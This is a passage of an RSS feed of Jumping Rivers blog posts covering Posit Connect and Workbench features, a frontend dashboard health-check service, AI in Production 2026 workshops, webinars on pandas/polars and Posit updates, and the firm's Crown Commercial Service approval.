&lt;p&gt;&lt;strong&gt;Usage Metrics&lt;/strong&gt; — shows you which content on your Connect server is actually being used, filtered by time period and user. It uses a visitor key, so the app shows each viewer only the content they have permission to see. Useful for admins wondering what&amp;rsquo;s getting traction and what isn&amp;rsquo;t.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Command Center for Publishers&lt;/strong&gt; — a dashboard built with Python that reimplements much of the Connect admin interface inside an app. You can rename deployed content, lock it, and manage it through the Connect API. Worth looking at both as a tool and as an example of how to build admin functionality on top of Connect.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re new to Connect or want to get more from it, our &lt;a href="https://www.jumpingrivers.com/training/course/r-posit-workbench-team-cloud/" rel="external"&gt;Introduction to Posit Workbench training course&lt;/a&gt; covers the full Posit environment including how Workbench and Connect work together.&lt;/p&gt;
&lt;h2 id="workbench-jobs-run-something-long-and-close-your-session"&gt;Workbench Jobs: run something long and close your session&lt;/h2&gt;
&lt;p&gt;This one comes up as a question fairly often: if I start a background job in &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;Posit Workbench&lt;/a&gt; and close my session, will it keep running?&lt;/p&gt;
&lt;p&gt;The old answer was no. Background jobs were child processes of your session, close the session and the job goes with it.&lt;/p&gt;
&lt;p&gt;Workbench Jobs are different. They run independently of your session. You can start a job, close RStudio Pro or VS Code entirely, and the job keeps going. When you open a new session, you can still see it running, check its live output, and monitor resource usage.&lt;/p&gt;
&lt;p&gt;This is handy for anything that takes longer than you want to babysit: data processing pipelines, model training runs, file exports. The job has access to your data sources and connections, and you can pick up wherever you left off.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s also an auditing option for Workbench Jobs. When enabled, the output gets a cryptographic signature, useful if you need to demonstrate not just that the job ran, but exactly what it produced.&lt;/p&gt;
&lt;h2 id="workbench-jobs-vs-scheduled-content-on-connect"&gt;Workbench Jobs vs scheduled content on Connect&lt;/h2&gt;
&lt;p&gt;A quick note on when to use which. If you need to run something once from inside your current workflow and you want access to local files, data connections, and everything in your working environment, a Workbench Job makes sense. It&amp;rsquo;s more hands-on.&lt;/p&gt;
&lt;p&gt;If you need to schedule something to run repeatedly, share the results with other people, or get an email when it&amp;rsquo;s done, that&amp;rsquo;s what Connect is for. The two tools complement each other rather than compete.&lt;/p&gt;
&lt;p&gt;If any of this is relevant to your setup, whether you&amp;rsquo;re looking at speeding up your package environment, making better use of Connect, or running longer jobs in Workbench — &lt;a href="https://www.jumpingrivers.com/posit/managed-services/" rel="external"&gt;get in touch&lt;/a&gt;. As a &lt;a href="https://www.jumpingrivers.com/posit/license-resale/" rel="external"&gt;certified Posit Partner&lt;/a&gt;, we help teams get the most from their Posit investment from infrastructure setup to long-term managed support.&lt;/p&gt;
&lt;hr&gt;
&lt;blockquote&gt;
&lt;h3 id="ai-in-production--45-june-2026-newcastle"&gt;AI in Production — 4–5 June 2026, Newcastle&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re thinking about how AI fits into production data science environments, this is the conference for it. Two days of real-world talks and hands-on workshops from practitioners across engineering and ML; covering deployment, monitoring, scaling, and what actually works when AI leaves the prototype stage.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;Register now at ai-in-production.jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-platform-updates/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Is Your Dashboard User Friendly?</title><link>https://www.jumpingrivers.com/blog/dashboard-ux/</link><pubDate>Thu, 12 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/dashboard-ux/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/dashboard-ux/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/dashboard-ux/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
figure {
background-color: var(--cream);
padding: 1rem;
font-size: 0.8rem;
display: flex;
flex-direction: column;
row-gap: 1rem;
margin-bottom: 1rem;
width: 625px;
max-width: 100%;
border-radius: 0.5rem;
margin-left: auto;
margin-right: auto;
}
figure img {
width: 100%;
}
figcaption {
border-top: 1px solid var(--off-white);
padding-top: 0.25rem;
}
&lt;/style&gt;
&lt;p&gt;For a while we, at Jumping Rivers, have offered a Dashboard Health Check (DHC) largely focused around backend features and other facets the end-user doesn&amp;rsquo;t see: things like version control, documentation and deployment. However, the DHC also included a few checks related to user experience and accessibility. While we&amp;rsquo;ve always believed these are useful additions, we would like to offer more in-depth guidance to our clients on how they can make their applications more user-friendly. To facilitate this, we are now introducing the Frontend Dashboard Health Check (FDHC).&lt;/p&gt;
&lt;h2 id="what-could-an-fdhc-help-me-with"&gt;What could an FDHC help me with?&lt;/h2&gt;
&lt;p&gt;So what kind of advice can you get from us from a Frontend Dashboard Healthcheck, you might wonder. Here are just a few of the possibilities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tools like Shiny and Dash make it relatively quick and easy to build data dashboards. These can often start out as a fixed single page of data and, over time, morph into something much more complex and interactive with multiple views. Such applications can be incredibly powerful, but with great power comes great &lt;del&gt;responsibility&lt;/del&gt; complexity. For a dashboard to be successful, users need to understand how to use it effectively to answer their questions. This can mean discovering and/or learning many features from basic navigation between views to how to interrogate the data contained within using techniques like search, filter, sort, partition, drill-down and summarise. We can suggest places where users may get stuck or confused, and suggest means of amelioration.&lt;/li&gt;
&lt;li&gt;A successful, production-ready, dashboard also needs to be robust. At minimum that means resilient to unexpected user input and to its own (perhaps temporary) inability to provide the output its supposed to (if a server is down, for example). An app that just hangs when something goes wrong is going to confuse and frustrate users and can lead to wasted time and even loss of work. We can show you where your app may fall over so that you can take action to prevent it.&lt;/li&gt;
&lt;li&gt;These days we consume pages from the world wide web using all manner of devices. Does your app work on 4k and 5k monitors? More importantly, at the other end of the scale, there is now usually the expectation that things should work on mobile and other touchscreen devices. We can show you at which dimensions your app layout may become difficult or impossible to use and where users using specific input methods - e.g. mouse, touch, keyboard - may have difficulties.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-deliverables-would-i-get-from-an-fdhc"&gt;What deliverables would I get from an FDHC?&lt;/h2&gt;
&lt;p&gt;The principle deliverable from an FDHC is a detailed spreadsheet indicating what issues we&amp;rsquo;ve found and where they can be found (or how to reproduce them). Wherever practical we will also include annotated screenshots (or occasionally recordings) giving a visual outline of a problem (see below). We will also strive to suggest possible remedies.&lt;/p&gt;
&lt;figure&gt;
&lt;picture id="page-spill" aria-labelledby="page-spill-label"&gt;
&lt;source srcset="assets/page-spill.webp 1x, assets/page-spill@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/page-spill.{{ $fallback }}" alt="{{ $alt }}"&gt;
&lt;/picture&gt;
&lt;figcaption id="page-spill-label"&gt;An example of annotated screenshots highlighting an issue with the page layout for certain width-ranges for an old version of our own Litmus Dashboard application.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure&gt;
&lt;picture id="permanent-labels" aria-labelledby="permanent-labels-label"&gt;
&lt;source srcset="assets/permanent-labels.webp 1x, assets/permanent-labels@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/permanent-labels.{{ $fallback }}" alt="{{ $alt }}"&gt;
&lt;/picture&gt;
&lt;figcaption id="permanent-labels-label"&gt;An example of an annotated screenshot highlighting an issue with input labelling for an old version of our own Litmus Dashboard application.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;h2 id="what-about-the-old-dhc"&gt;What about the old DHC?&lt;/h2&gt;
&lt;p&gt;We will continue to offer a separate, report-based, health check for data dashboards. This &amp;ldquo;Backend Dashboard Health Check&amp;rdquo; (BDHC) will cover things like version control, documentation, deployment as before. We are, of course, more than happy to run a BDHC and an FDHC on the same application.&lt;/p&gt;
&lt;h2 id="how-do-i-find-out-more"&gt;How do I find out more?&lt;/h2&gt;
&lt;p&gt;Please get in touch via &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;this contact form&lt;/a&gt; or drop us an email at &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/dashboard-ux/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>AI in Production 2026 Workshops: What’s Coming in June</title><link>https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/</link><pubDate>Wed, 11 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are excited to share more details about the workshops taking place at &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production 2026&lt;/strong&gt;&lt;/a&gt;, which will be held in &lt;strong&gt;Newcastle upon Tyne on 4–5 June 2026&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;AI in Production is a two-day conference. &lt;strong&gt;Day 1 (Thursday 4 June)&lt;/strong&gt; is dedicated to hands-on workshops, followed by a full day of conference talks on &lt;strong&gt;Friday 5 June&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The workshop sessions are designed to give attendees practical exposure to the tools, patterns, and decisions involved in running AI systems in production. From large language models and data platforms to modern development tools, the focus is on how AI systems are actually built, deployed, and maintained.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="how-day-1-works"&gt;How Day 1 Works&lt;/h2&gt;
&lt;p&gt;Thursday 4 June is divided into &lt;strong&gt;morning and afternoon workshop sessions&lt;/strong&gt;, allowing attendees to take part in &lt;strong&gt;two half-day workshops&lt;/strong&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two workshops&lt;/strong&gt; across the day&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lunch is included&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;All workshop tickets include access to the &lt;strong&gt;Thursday evening dinner reception&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Workshops are delivered by &lt;strong&gt;Jumping Rivers consultants and invited speakers&lt;/strong&gt;, including practitioners working with platforms such as &lt;a href="https://www.databricks.com/" rel="external"&gt;Databricks&lt;/a&gt; and modern AI tooling in production environments.&lt;/p&gt;
&lt;h2 id="morning-workshops"&gt;Morning Workshops&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;09:30 – 12:45&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="prompt-craft-and-ai-integration-building-llm-driven-workflows-in-r-and-python"&gt;Prompt Craft and AI Integration: Building LLM Driven Workflows in R and Python&lt;/h3&gt;
&lt;p&gt;This workshop focuses on integrating large language models into &lt;strong&gt;R and Python workflows&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Participants will explore prompt design, calling LLMs from production code, and handling common challenges such as inconsistent outputs and failure cases. The emphasis is on understanding where LLMs add value and how they fit into reliable systems.&lt;/p&gt;
&lt;h3 id="from-nothing-to-gold-productionising-with-databricks-using-the-medallion-architecture"&gt;From Nothing to Gold: Productionising with Databricks Using the Medallion Architecture&lt;/h3&gt;
&lt;p&gt;This workshop walks through the &lt;strong&gt;Medallion Architecture&lt;/strong&gt; as it is used in production environments.&lt;/p&gt;
&lt;p&gt;Participants will explore how data moves from raw ingestion to analytics and machine learning ready layers, with a focus on structure, quality, and scalability. The session draws on hands-on experience using Databricks to support data engineering and AI workloads.&lt;/p&gt;
&lt;h3 id="improving-your-workflow-with-positron-and-claude"&gt;Improving Your Workflow with Positron and Claude&lt;/h3&gt;
&lt;p&gt;This session explores how modern development tools support day-to-day data science and engineering work.&lt;/p&gt;
&lt;p&gt;The workshop focuses on using &lt;strong&gt;Positron alongside AI assistance&lt;/strong&gt; to write, explore, and refine code more efficiently while maintaining clarity and control. It is particularly relevant for teams working in &lt;strong&gt;R and Python&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="afternoon-workshops"&gt;Afternoon Workshops&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;13:45 – 17:00&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="shiny-meets-llms-smarter-app-experiences"&gt;Shiny Meets LLMs: Smarter App Experiences&lt;/h3&gt;
&lt;p&gt;This workshop explores how large language models can be integrated into &lt;strong&gt;Shiny applications&lt;/strong&gt; to create more interactive user experiences.&lt;/p&gt;
&lt;p&gt;Topics include designing effective user interactions, managing latency and cost, and thinking through reliability when deploying AI-enabled apps to users.&lt;/p&gt;
&lt;h3 id="the-power-of-databricks-genie-rooms-data-discovery-and-questions-with-minimal-effort"&gt;The Power of Databricks Genie Rooms: Data Discovery and Questions with Minimal Effort&lt;/h3&gt;
&lt;p&gt;This workshop focuses on &lt;strong&gt;Databricks Genie Rooms&lt;/strong&gt; and their role in natural language driven data discovery.&lt;/p&gt;
&lt;p&gt;Participants will explore how this approach works in practice, when it is effective, and where its limitations lie, particularly in production settings that support analysts and business users.&lt;/p&gt;
&lt;h3 id="self-hosted-llms-running-your-own-inference-infrastructure"&gt;Self Hosted LLMs: Running Your Own Inference Infrastructure&lt;/h3&gt;
&lt;p&gt;This workshop focuses on running &lt;strong&gt;large language models on your own infrastructure&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The session covers infrastructure choices, performance and cost trade-offs, and operational considerations, factoring in constraints such as privacy, regulation, and reliability.&lt;/p&gt;
&lt;h2 id="drinks-reception"&gt;Drinks Reception&lt;/h2&gt;
&lt;p&gt;Day 1 concludes with a &lt;strong&gt;dinner and drinks reception from 17:00 to 19:30&lt;/strong&gt;, hosted in the &lt;strong&gt;atrium of The Catalyst building&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;This reception is included with all workshop tickets and offers an opportunity to meet speakers, connect with other attendees, and continue conversations before the conference talks on Friday.&lt;/p&gt;
&lt;h2 id="who-the-workshops-are-for"&gt;Who the Workshops Are For&lt;/h2&gt;
&lt;p&gt;The Day 1 workshops are designed for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data scientists and machine learning practitioners&lt;/li&gt;
&lt;li&gt;Engineers working on AI and data platforms&lt;/li&gt;
&lt;li&gt;Analysts moving closer to production work&lt;/li&gt;
&lt;li&gt;Technical leads responsible for AI systems&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each workshop stands on its own, allowing you to choose sessions that best match your interests.&lt;/p&gt;
&lt;h2 id="join-us-in-newcastle"&gt;Join Us in Newcastle&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production 2026&lt;/strong&gt;&lt;/a&gt; takes place on &lt;strong&gt;4–5 June 2026&lt;/strong&gt; at &lt;strong&gt;The Catalyst in Newcastle upon Tyne&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Workshop places are limited to keep sessions interactive. If you are interested in AI in production, Databricks, LLMs, R, Python, or modern data platforms, you can learn more and register on the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production conference website&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ai-in-production-2026-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Data Processing in Pandas and Polars: Free Jumping Rivers Webinar</title><link>https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/</link><pubDate>Thu, 05 Mar 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python offers a wide range of tools for data manipulation, but choosing the right one often depends on performance needs, workflow preferences, and dataset size.&lt;/p&gt;
&lt;p&gt;On &lt;strong&gt;19 March&lt;/strong&gt;, Jumping Rivers is hosting a webinar focused on a practical question: &lt;strong&gt;how does data processing compare between pandas and polars?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The session will be led by &lt;a href="https://www.jumpingrivers.com/authors/russ-hyde/" rel="external"&gt;Russ Hyde&lt;/a&gt;, Senior Data Scientist at Jumping Rivers, who regularly works with Python based data workflows across analysis, training, and production environments.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;&lt;strong&gt;You can register for the webinar using this form.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-youll-learn"&gt;What You’ll Learn&lt;/h2&gt;
&lt;p&gt;This session will implement the same data processing pipeline in both pandas and polars to highlight how each library approaches common tasks.
Russ will walk through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Key syntax differences between pandas and polars&lt;/li&gt;
&lt;li&gt;How each library handles core data manipulation steps&lt;/li&gt;
&lt;li&gt;Performance and usability considerations&lt;/li&gt;
&lt;li&gt;New functionality introduced in pandas 3.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal is to give Python users a clearer understanding of when each tool makes sense and how recent updates affect day to day workflows.&lt;/p&gt;
&lt;h2 id="why-this-matters"&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;Pandas remains the standard library for in memory tabular data analysis, and familiarity with its syntax is essential for many data science roles.
At the same time, polars is gaining attention due to its performance focused design and efficient execution model.&lt;/p&gt;
&lt;p&gt;Understanding the strengths and trade offs of both libraries helps teams:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improve data processing performance&lt;/li&gt;
&lt;li&gt;Choose tools aligned with project requirements&lt;/li&gt;
&lt;li&gt;Write clearer and more maintainable code&lt;/li&gt;
&lt;li&gt;Stay current with developments in the Python ecosystem&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As expectations around performance and scalability increase, informed tooling decisions become more important.&lt;/p&gt;
&lt;h2 id="continued-learning-benefits"&gt;Continued Learning Benefits&lt;/h2&gt;
&lt;p&gt;Jumping Rivers encourages teams to stay engaged with the wider webinar series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off tickets&lt;/strong&gt; to the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026 conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off&lt;/strong&gt; any Jumping Rivers public training course&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="event-details"&gt;Event Details&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Date:&lt;/strong&gt; 19 March 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time:&lt;/strong&gt; 1:15 PM (UK time)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Venue:&lt;/strong&gt; Online&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;&lt;strong&gt;Register for the webinar using this form to secure your spot.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-processing-pandas-polars-webinar/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers Now Approved to Sell Services Through DOS7: Crown Commercial Services</title><link>https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/</link><pubDate>Tue, 17 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers has been approved to sell our services through the &lt;a href="https://www.crowncommercial.gov.uk/" rel="external"&gt;Crown Commercial Service&lt;/a&gt; CCS.&lt;/p&gt;
&lt;p&gt;For UK public sector organisations, this is an important milestone. It means there is now a simpler, compliant way to work with us without going through lengthy procurement processes from scratch.&lt;/p&gt;
&lt;h2 id="what-the-crown-commercial-service-does"&gt;What the Crown Commercial Service does&lt;/h2&gt;
&lt;p&gt;The Crown Commercial Service supports public sector organisations by creating and managing procurement frameworks. These frameworks are designed to help teams buy services in a way that is compliant, transparent, and efficient.&lt;/p&gt;
&lt;p&gt;Instead of running a full tender every time a service is needed, public sector buyers can use CCS frameworks to access pre approved suppliers who have already met specific standards around capability, pricing, and compliance.&lt;/p&gt;
&lt;h2 id="what-our-approval-means"&gt;What our approval means&lt;/h2&gt;
&lt;p&gt;Being approved on a CCS framework means our services have been reviewed and assessed against the requirements expected for public sector procurement.&lt;/p&gt;
&lt;p&gt;This includes areas such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Technical capability and experience&lt;/li&gt;
&lt;li&gt;Value for money&lt;/li&gt;
&lt;li&gt;Compliance with public sector procurement standards&lt;/li&gt;
&lt;li&gt;Clear and transparent service offerings&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For public sector teams, this reduces risk and removes a lot of the administrative burden that often comes with procurement.&lt;/p&gt;
&lt;h2 id="why-this-matters-for-public-sector-teams"&gt;Why this matters for public sector teams&lt;/h2&gt;
&lt;p&gt;If you work in the public sector, you are often balancing delivery pressure with strict procurement rules. Even when a team knows who they want to work with, the process of getting approval can slow things down.&lt;/p&gt;
&lt;p&gt;By being available through CCS, we can now be procured through an established framework that many organisations already use.&lt;/p&gt;
&lt;p&gt;This means&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Faster access to our services&lt;/li&gt;
&lt;li&gt;Less time spent on procurement paperwork&lt;/li&gt;
&lt;li&gt;Confidence that the supplier has already been vetted&lt;/li&gt;
&lt;li&gt;A clearer route to starting work&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="who-this-is-relevant-for"&gt;Who this is relevant for&lt;/h2&gt;
&lt;p&gt;This approval is particularly useful for teams across&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Local and central government&lt;/li&gt;
&lt;li&gt;Healthcare and NHS organisations&lt;/li&gt;
&lt;li&gt;Education and research institutions&lt;/li&gt;
&lt;li&gt;Other public sector bodies using CCS frameworks&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your organisation already buys services through CCS, you can now engage us directly using that route.&lt;/p&gt;
&lt;h2 id="what-this-means-for-working-with-us"&gt;What this means for working with us&lt;/h2&gt;
&lt;p&gt;Nothing changes about how we work day to day. We still focus on understanding your context, your constraints, and what you actually need support with.&lt;/p&gt;
&lt;p&gt;What has changed is how easy it is to get started.&lt;/p&gt;
&lt;p&gt;If you are required to buy through CCS, this approval removes friction and shortens the path from first conversation to delivery.&lt;/p&gt;
&lt;h2 id="not-sure-where-to-start"&gt;Not sure where to start&lt;/h2&gt;
&lt;p&gt;If you are unsure which CCS framework applies to your organisation or whether this route is right for you, we are happy to talk it through.&lt;/p&gt;
&lt;p&gt;We can help you understand&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Which framework to use&lt;/li&gt;
&lt;li&gt;Whether your organisation is eligible&lt;/li&gt;
&lt;li&gt;How to move from initial discussion to procurement&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our goal is to make working together as straightforward as possible. If you would like to get in touch, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;you can contact us.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Keeping Posit Environments Reliable in Production: Free Jumping Rivers Webinar</title><link>https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/</link><pubDate>Wed, 11 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Teams often treat software updates as something to postpone until absolutely necessary. But with analytics platforms, falling behind can introduce avoidable risk, compatibility issues, and missed improvements.&lt;/p&gt;
&lt;p&gt;On &lt;strong&gt;19 February&lt;/strong&gt;, Jumping Rivers is hosting a webinar focused on a simple question: &lt;strong&gt;why should teams keep their Posit software up to date?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The session will be led by &lt;strong&gt;Sebastian Mellor&lt;/strong&gt;, Head of Engineering at Jumping Rivers, who supports organisations running Posit tools in production environments.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs?typeform-source=www.jumpingrivers.com" rel="external"&gt;&lt;strong&gt;You can register for the webinar using this form.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-youll-learn"&gt;What You’ll Learn&lt;/h2&gt;
&lt;p&gt;This session will highlight concrete examples pulled directly from recent Posit release notes.&lt;/p&gt;
&lt;p&gt;Sebastian will walk through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What changed and why it matters&lt;/li&gt;
&lt;li&gt;How updates affect reliability, security, and performance&lt;/li&gt;
&lt;li&gt;The risks of delaying upgrades&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal is to give teams a clearer picture of what they gain by staying current and what can happen when updates are ignored.&lt;/p&gt;
&lt;h2 id="why-this-matters"&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;Keeping Posit software updated is not just about new features. It supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Stability across environments&lt;/li&gt;
&lt;li&gt;Compatibility with evolving tooling&lt;/li&gt;
&lt;li&gt;Security improvements&lt;/li&gt;
&lt;li&gt;Better performance for data science teams&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even small version gaps can compound over time, making upgrades harder and increasing operational friction.&lt;/p&gt;
&lt;h2 id="continued-learning-benefits"&gt;Continued Learning Benefits&lt;/h2&gt;
&lt;p&gt;Jumping Rivers encourages teams to stay engaged with the wider webinar series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off tickets&lt;/strong&gt; to the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026 conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off&lt;/strong&gt; any Jumping Rivers public training course&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="event-details"&gt;Event Details&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Date:&lt;/strong&gt; 19 February 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time:&lt;/strong&gt; 1:15 PM (UK time)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Venue:&lt;/strong&gt; Online&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs?typeform-source=www.jumpingrivers.com" rel="external"&gt;&lt;strong&gt;Register for the webinar using this form to secure your spot.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Building a Robust .gitconfig</title><link>https://www.jumpingrivers.com/blog/recommended-gitconfig/</link><pubDate>Thu, 05 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/recommended-gitconfig/</guid><description>
&lt;p&gt;
